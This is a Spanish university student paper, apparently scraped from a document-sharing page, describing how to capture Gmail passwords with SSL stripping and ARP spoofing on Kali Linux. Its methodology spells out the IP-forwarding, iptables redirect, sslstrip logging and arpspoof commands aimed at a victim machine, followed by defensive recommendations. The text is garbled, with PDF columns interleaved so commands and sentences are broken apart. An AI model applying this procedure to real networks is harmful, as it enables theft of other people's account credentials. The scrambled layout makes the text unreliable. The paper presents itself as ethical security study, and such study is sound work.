Sie sind auf Seite 1von 6

HACKING GMAIL ACCOUNT USING KALI LINUX (SSL STRIPING AND

ARP SPOOFING)
Fabin Revelo
Byron Palacios
Estudiante de la Universidad Tcnica de Ambato Estudiante de la Universidad Tcnica de Ambato
Facultad de Ingeniera en Sistemas Electrnica e Facultad de Ingeniera en Sistemas Electrnica e
Industrial
Industrial
Ambato Ecuador
Ambato Ecuador
faby89.science@gmail.com
byronpalacioss@outlook.es

RESUMEN
En este proyecto se desarrolla un procedimiento
para realizar el muestreo e identificacin de claves
personales de cuentas de gmail, dentro de la distro
de kali Linux. Los pasos que se siguen muestran
claramente como un sistema en este caso de
servicio de correo web, puede ser hackeado con
aparente facilidad, a travs de un conjunto de
consideraciones. Es importante notar que se realiza
con fines ticos para de esta forma identificar las
vulnerabilidades que existen, con el fin de conocer
que mecanismos podemos adoptar para evitar de
alguna forma, contrarrestar o eliminar en gran parte
la amenaza de invasin a nuestros datos personales.
ABSTRACT
This project develops a method for sampling and
identification of key personnel gmail accounts
within the kali Linux distro. The steps that follow
clearly show how a system in this case webmail
service, can be hacked with apparent ease, through
a set of considerations. Importantly performed with
ethical ends to thereby identify vulnerabilities that
exist in order to know which mechanisms can take
to avoid somehow offset or largely eliminate the
threat of invasion of our personal data.
PALABRAS CLAVE
gmail, ssl striping, arp spoofing, attack.
INTRODUCCIN
Dentro del mundo de la seguridad informtica, cabe
decir que es punto crtico dentro del manejo de la
informacin en empresas, de orden mundial. En el
medio donde se manejan grandes cantidades de
informacin y datos personales asi como de bases
de datos de empresas, es fundamental que se
guarde con extrema confidencialidad, los recursos
frente a terceros.
El uso de cuentas de correo (gmail), no es la
excepcin y es por ello que tambin es vulnerable
contra los ataques de expertos crackers del mundo
informtico.
Oren Hafif ,que trabaja en una compaa en Tel
Aviv, quien sali a la palestra, luego de haber
publicado una alarmante entrada en su blog
personal: descubri la forma de conseguir
virtualmente todas las direcciones de correo

electrnico de Gmail, sin permiso como es de


esperarse.
Resulta que el investigador encontr un bug o
vulnerabilidad que permite a cualquiera con los
conocimientos suficientes realizar la maniobra,
explotando una funcin de Gmail llamada "Gmail
delegation feature" y que fue implementada por la
compaa hace ms de cuatro aos.
Hafif slo necesit realizar un ataque de fuerza
bruta para conseguir cerca de 37.000 direcciones de
correo electrnico en dos horas, pudiendo haber
seguido con el proceso eternamente para
conseguirlas todas, como l mismo asegura.
Potencialmente, se pudo haber hecho esto para
siempre.
Esto permite imaginar que con la falla vigente
durante cuatro aos desde que Google
implement "Gmail
delegation
feature"
en
2010,quizs alguien ya tiene una base de datos con
absolutamente todas las direcciones de Gmail en su
poder. Y eso sera alarmante, ya que es mucho lo
que puede hacerse con una direccin de correo y
ms an con una base de datos de todo Gmail;
desde intentar acceder a las cuentas, hasta
enviar spam y publicidad en forma delirante a todo
el mundo.[1]
Petko Petkov, investigador de vulnerabilidades en
el Reino Unido, ha informado de un fallo de
seguridad existente en el servicio de correos de
Google, GMAIL.
La vulnerabilidad ha sido confirmada por Google y
reside en insertar cdigo malicioso en una cuenta
abierta. Mediante el mismo comando que utiliza
Gmail para subir archivos, un atacante podra ser
capaz de subir un filtro con instrucciones
especficas y obtener lo que se encuentre guardado
all. Por ejemplo, el filtro podra reenviar los
mensajes con archivos adjuntos al usuario
malicioso.
La vulnerabilidad puede ocurrir cuando un usuario
visita un sitio web malicioso, y su correo de Gmail
se encuentra abierto en otra ventana del navegador,
por lo que se recomienda cerrar la sesin de Gmail

1._Conocer la direccin IP y el default Gateway de


la mquina vctima
2._Habilitar el reenvo de IP en Kali Linux
3._Configurar las reglas de IPTABLES en Kali
Linux
4._Iniciar ssl striping daemon en Kali Linux
5._Iniciar ARSPOOF en Kali Linux

antes de seguir navegando a posibles pginas


maliciosas.[2]
Google public en su blog oficial en el mes de
junio del 2014 una advertencia sobre un reciente
ataque
sufrido
por
su
servicio
de
correo Gmail; destinado a obtener acceso a las
cuentas de usuario de altos responsables del
gobierno de Estados Unidos, disidentes chinos,

DESARROLLO

miembros de gobiernos asiticos (preferentemente


de Corea del Sur), responsables militares y
periodistas.
La compaa de inmediato tom cartas en el asunto
logrando interrumpir el ataque, aunque de todas
maneras se comunicaron con los gobiernos y
usuarios afectados.

Ver las direccin IP y default Gateway de nuestra


mquina victima
Habilitar el reenvo de IP en Kali Linux
cat /proc/sys/net/ipv4/ip_forward
(se aparecer el valor de 0)
echo 1 >/proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
(se aparecer el valor de 1)
Estamos de esta forma configurando a kali Linux
como un router

Segn la investigacin realizada por Googl,e los


atacantes
habran
utilizado
tcnicas
de malware y phishing para obtener las claves,
siendo el origen de estos ataques la localidad China
de Jinan.
Configuramos las reglas de IPTABLES
Segn la compaa el objetivo del ataque sera
lograr controlar de alguna manera el contenido de
Iptables t net a PREROUTING p tcp
los correos electrnicos enviados por los usuarios,
destination-port-80 j REDIRECT to-port- 7777
para lo cual habran cambiado las opciones de
reenvo y delegacin de correos.
Con la finalidad de asegurar que este hecho no se
vuelva a repetir, la compaa de la gran G
recomend utilizar slo contraseas seguras en las
cuentas de los usuarios. Adems sugiere utilizar la Verificamos que este funcionando correctamente
opcin de verificacin de cuentas en aquellos
netstat na | grep 7777
lugares donde se encuentre disponible.
No es la primera vez que Google tiene
enfrentamientos con China. El ao pasado, la
compaa acus un ataque proveniente de ese pas
que tena como objetivo obtener secretos
industriales. Tras ese incidente, Google decidi
salir de China, redireccionando a los usuarios al
sitio de Hong Kong y dejando de censurar
resultados, como ordena el gobierno. [3]

METODOLOGA

Arrancamos el ssl striping daemon en Kali Linux

El resultado del ssl streaming es:

CONCLUSIONES

sslstrip l 7777 w dumppaswd.log


En este punto necesitamos la direccin IP de la
mquina vctina y la direccin de gateway
Abrimos el terminal y el comando es :
arpspoof
i
eth0
t
192.168.0.106
192.168.0.107

Es importante configurar la proteccin de


nuestra cuenta de gmail a travs de la
configuracin que nos ofrece Google
La mejor forma de saber si alguien ha
entrado en tu cuenta de Gmail es revisar la
actividad que ha tenido esta plataforma de
correo en los ltimos das
Debemos cambiar las alertas de actividades
poco habituales en nuestra cuenta de gmail
Resulta muy interesante el botn que nos
permite Cerrar todas las dems sesiones,
una funcin clave si por ejemplo utilizamos
en algn momento Gmail en un ordenador
pblico y se nos olvid cerrar la sesin

Abrimos un navegador de internet


e
intentamos ingresar a nuestra cuenta de gmail
ingresando el correo electrnico y nuestro
password

RECOMENDACIONES

Precaucin en redes Wi - Fi "inseguras" o


"pblicas". La consulta del correo
electrnico dentro de un espacio de estas
caractersticas puede comprometer la
seguridad del usuario ya que algn
"ciberdelincuente" puede espiar las
comunicaciones y estar capturando las
contraseas y la informacin de los usuarios

conectados a esa red. Es importante


verificar que las pginas accedidas estn
certificadas digitalmente.

Contraseas seguras. Para lograr una que


sea lo esencialmente inquebrantable debe
ser igual o mayor a 10 caracteres y poseer
maysculas, minsculas, nmeros y
caracteres especiales

REFERENCIAS BIBLIOGRFICAS

[1]https://www.fayerwayer.com/2014/06/vu
lnerabilidad-en-gmail-permitia-a-un-hackerconseguir-todas-las-direcciones-de-correo/
[2]https://escert.upc.edu/content/vulnerabili
dad-en-gmail
[3]https://www.fayerwayer.com/2011/06/go
ogle-advierte-del-robo-de-contrasenas-degmail/

Das könnte Ihnen auch gefallen